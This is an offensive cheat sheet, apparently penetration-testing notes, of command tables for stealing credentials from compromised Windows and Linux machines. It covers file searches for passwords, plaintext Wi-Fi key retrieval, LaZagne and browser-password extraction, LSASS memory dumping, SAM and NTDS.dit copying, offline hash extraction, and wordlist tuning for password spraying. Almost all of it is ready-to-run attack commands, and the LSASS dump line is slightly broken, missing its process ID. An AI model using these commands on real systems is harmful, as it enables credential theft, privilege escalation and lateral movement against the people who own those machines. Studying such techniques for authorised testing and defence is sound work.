Credential Theft Techniques
This guide outlines common methods for discovering and extracting credentials from compromised systems. These techniques focus on searching for sensitive data within files, system memory, and application-specific storage. The primary goal is to identify passwords, API keys, connection strings, and other secrets that can be used for privilege escalation or lateral movement.
File-Based Credential Hunting
This method involves searching the filesystem for plaintext or lightly-obfuscated credentials stored in configuration files, scripts, and user documents.
| Command | Description |
|---|
| findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml | Uses the built-in Windows findstr utility to search for the literal string "password" in common configuration and text files. /S for recursive, /I for case-insensitive, /M to print only the filename if a match is found. |
| Get-Content 'C:\Users\...\Custom Dictionary.txt' | Select-String "password" | (PowerShell) Searches for the string "password" within Google Chrome's custom dictionary file, where users might accidentally save credentials. |
| (Get-PSReadLineOption).HistorySavePath | (PowerShell) Confirms the file path where the PowerShell console history is stored. |
| Get-Content (Get-PSReadLineOption).HistorySavePath | (PowerShell) Reads the PowerShell history file, which may contain sensitive information, including credentials typed into the console. |
| $credential = Import-Clixml -Path 'C:\scripts\pass.xml' | (PowerShell) Deserializes a credential object from a CLIXML file. If an administrator saved credentials using Export-Clixml, this command can be used to load them back into a PowerShell session. The password will be in a SecureString format. |
| findstr /SPIN "password" *.* | A more thorough findstr command to recursively /S search for the string "password" /P skipping non-printable characters /I case-insensitively /N with line numbers in all files (*.*). |
| Select-String -Path C:\Users\user\Documents\*.txt -Pattern "password" | (PowerShell) A PowerShell alternative to findstr for searching file contents for a specific pattern. |
| dir /S /B *pass*.txt *pass*.xml *pass*.ini *.cred *.vnc *.config | Recursively /S searches the entire disk for files with names or extensions related to credentials, displaying them in a bare format /B. |
| where /R C:\ *.config | Searches for files with the .config extension starting from the root of the C:\ drive. Useful for quickly locating application configuration files. |
| Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction SilentlyContinue | (PowerShell) A powerful command to recursively search for files with specific extensions (.rdp, .config, etc.) across the C:\ drive, ignoring any access-denied errors. |
| cmdkey /list | Lists all credentials stored in the Windows Credential Manager for the current user, such as RDP, network share, and generic Windows credentials. |
| netsh wlan show profile | Displays all Wi-Fi network profiles (SSIDs) that the machine has connected to. |
| netsh wlan show profile "SSID-Name" key=clear | Retrieves the stored plaintext Wi-Fi password (key=clear) for a specific network profile. |
| Command | Description |
|---|
| .\SharpChrome.exe logins | A .NET tool for extracting saved logins from Google Chrome's database. |
| .\lazagne.exe -h | Displays the help menu for LaZagne, a popular open-source tool for recovering passwords stored on a local computer. |
| .\lazagne.exe all | Executes all available LaZagne modules to find passwords from browsers, Git, databases, chat clients, and more. |
| Invoke-SessionGopher -Target WIN-SRV01 | (PowerShell) A script that hunts for saved session information of remote access tools like PuTTY, WinSCP, and RDP. It can extract hostnames, usernames, and private keys. |
Windows Local Password Attacks
These techniques target system-level files and processes to extract password hashes and other credentials from memory.
| Command | Description |
|---|
| tasklist /SVC | Lists all running processes and the services hosted within them. Useful for identifying processes like lsass.exe and their Process ID (PID). |
| Get-Process lsass | (PowerShell) Retrieves information about the Local Security Authority Subsystem Service (LSASS) process, including its PID, which is required for creating a memory dump. |
| rundll32 C:\windows\system32\comsvcs.dll, MiniDump C:\lsass.dmp full | Creates a full memory dump of a process (identified by its ) using a built-in Windows DLL. This is a common technique to dump the LSASS process memory to a file for offline credential extraction. |
| reg.exe save hklm\sam C:\sam.save | Saves a copy of the Security Account Manager (SAM) registry hive. This file contains local user password hashes but requires the SYSTEM and SECURITY hives to be decrypted. |
| vssadmin CREATE SHADOW /For=C: | Creates a Volume Shadow Copy of the C: drive. This is a crucial step for safely copying files that are locked by the operating system, such as the NTDS.dit database on a Domain Controller. |
| copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\NTDS.dit C:\NTDS.dit | Copies the locked NTDS.dit file from the newly created Volume Shadow Copy to a new location. |
Offline Analysis
| Command | Description |
|---|
| pypykatz lsa minidump /path/to/lsass.dmp | (On attacker machine) An all-Python implementation of Mimikatz used to parse an lsass.dmp file and extract plaintext passwords, tickets, and hashes. |
| secretsdump.py -sam sam.save -system system.save -security security.save LOCAL | (On attacker machine) A tool from the Impacket suite that extracts password hashes from the SAM, SYSTEM, and SECURITY registry hives for offline cracking. |
Linux Local Password Attacks
These methods focus on finding credentials and sensitive information on Linux-based systems.
| Command | Description |
|---|
| find / -name "*.conf" -o -name "*.config" -o -name "*.cnf" 2>/dev/null | Searches the entire filesystem for common configuration file extensions. Errors are redirected to /dev/null to keep the output clean. |
| grep -r "user|password|pass" /etc 2>/dev/null | Recursively searches all files in the /etc directory for lines containing "user", "password", or "pass". |
| find / -name "*.sql" -o -name "*.db" 2>/dev/null | Searches for common database file extensions. |
| find /home -type f -name "*.txt" | Searches for all .txt files within user home directories. |
| cat /etc/crontab | Displays the system-wide crontab file. Cron jobs may contain scripts with hardcoded credentials. |
| ls -la /etc/cron.* | Lists the contents of cron directories (cron.daily, cron.hourly, etc.) to find scheduled scripts. |
| grep -rnw "PRIVATE KEY" / 2>/dev/null | Recursively searches the entire filesystem for files containing the string "PRIVATE KEY" to discover SSH private keys. |
| grep -rnw "ssh-rsa" /home/*/.ssh/id_rsa.pub 2>/dev/null | Searches for ssh-rsa strings specifically in public key files, which can reveal usernames and hostnames. |
| history or cat ~/.bash_history | Displays the user's command history, which may contain passwords or other sensitive data entered on the command line. |
| Command | Description |
|---|
| ./mimipenguin.sh or python mimipenguin.py | A Linux tool inspired by Mimikatz that dumps logins from memory. |
| python lazagne.py all | Runs the Linux version of LaZagne to extract passwords from browsers, system accounts, and various applications. |
| cat ~/.mozilla/firefox/*.default-release/logins.json | jq . | Parses and pretty-prints the logins.json file from a Firefox profile, which stores saved usernames and passwords in a readable (but sometimes encrypted) format. |
| python3 firefox_decrypt.py | A script designed to decrypt passwords stored in Firefox's logins.json and key4.db files. |
Customizing Wordlists with Grep and Sed
This section covers how to refine password wordlists to match specific password policies, increasing the efficiency of brute-force and password-spraying attacks.
| Policy Requirement | Command | Explanation |
|---|
| Minimum Length (e.g., 8) | grep -E '^.{8,}$' wordlist.txt | Keeps lines that contain 8 or more characters. |
| At Least One Uppercase | grep '[A-Z]' wordlist.txt | Keeps lines that contain at least one uppercase letter. |
| At Least One Lowercase | grep '[a-z]' wordlist.txt | Keeps lines that contain at least one lowercase letter. |
| At Least One Digit | grep '[0-9]' wordlist.txt | Keeps lines that contain at least one digit. |
| At Least One Special Char | grep '[!@#$%^&*()]' wordlist.txt | Keeps lines that contain at least one special character from the specified set. |
| No Consecutive Repeats | grep -vE '(.)\1' wordlist.txt | Inverts the match (-v) to remove lines that have any character repeated consecutively. |
| Combination of Policies | grep -E '^.{8,}$' wordlist.txt | grep '[A-Z]' | grep '[0-9]' | Chains multiple grep commands to filter a wordlist. This example creates a new list with passwords that are at least 8 characters long AND contain an uppercase letter AND contain a digit. |
| Keep Only Lines with Numbers | sed -i '/[0-9]/!d' wordlist.txt | Modifies the file in-place (-i). Deletes (d) all lines that do not (!) match the pattern (contain a digit). |
| Keep Only Lines with Special Chars | sed -i '/[!-/:-@\[-{-~]/!d' wordlist.txt` | Similar to the above, this uses a broad regex for special characters and deletes all lines that do not contain at least one. |
| Remove Lines Shorter Than 8 | sed -i '/^.{1,7}$/d' wordlist.txt | Deletes all lines that are between 1 and 7 characters long, effectively enforcing a minimum length of 8. |